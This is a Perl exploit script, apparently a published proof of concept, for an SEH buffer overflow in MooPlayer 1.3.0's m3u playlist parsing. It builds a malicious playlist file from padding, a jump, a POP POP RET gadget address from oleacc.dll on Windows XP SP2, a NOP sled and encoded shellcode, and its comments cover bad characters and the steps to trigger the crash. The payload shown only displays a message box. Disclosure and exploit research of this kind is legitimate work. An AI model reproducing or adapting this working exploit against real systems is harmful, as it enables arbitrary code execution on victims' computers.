#!/usr/bin/perl ################################# # Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow # Date: 09-02-2015 # Exploit Author: Tomislav Paskalev # Vulnerable Software: MooPlayer v1.3.0 # Vendor Homepage: https://mooplayer.jaleco.com/ # Version: 1.3.0 # Tested on: Windows XP SP2 EN # OSVDB-ID: 118128 ################################# # Credits: # Vulnerability identified by Samandeep Singh # http://www.exploit-db.com/exploits/36022/ ###########################################################################= ################################# # Exploit notes: # mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character) # available and could be used, which would make the exploit work across multiple OS # versions, but the shellcode space would be limited since \x00 would terminate the string # other available modules (Win XP SP2 EN) - enough space for larger shellcode # oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) # OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True) ###########################################################################= ################################# # Bad characters: # "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09" # "\x0b\x0c" # "\x0e\x0f" # "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19" # "\x1a\x1b\x1c\x1d\x1e\x1f" ###########################################################################= ################################# # How to exploit: # MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit # file) -> Open # OR drag and drop created exploit file into MooPlayer ###########################################################################= ################################# # Thanks to: # Samandeep Singh (PoC) # Peter Van Eeckhoutte (exploit development tutorials) # Offensive Security (IT security courses, admin support) ###########################################################################= ################################# $file = "MooPlayer_messagebox.m3u"; my $junk = "A" x 264; my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN) my $NOPs = "\x90" x 100; # msfpayload windows/messagebox # msfencode -e x86/alpha_upper my $shellcode = "\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" . "\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" . "\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" . "\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" . "\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" . "\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" . "\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" . "\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" . "\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" . "\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" . "\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" . "\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" . "\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" . "\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" . "\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" . "\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" . "\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" . "\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" . "\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" . "\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" . "\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" . "\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" . "\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" . "\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" . "\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" . "\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" . "\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" . "\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" . "\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" . "\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" . "\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" . "\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" . "\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" . "\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" . "\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" . "\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" . "\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" . "\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" . "\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" . "\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" . "\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" . "\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" . "\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" . "\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" . "\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" . "\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" . "\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" . "\x4f\x50\x55\x45\x58\x41\x41"; # keep the exploit length consistent my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode)); open(myfile,">$file") ; print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;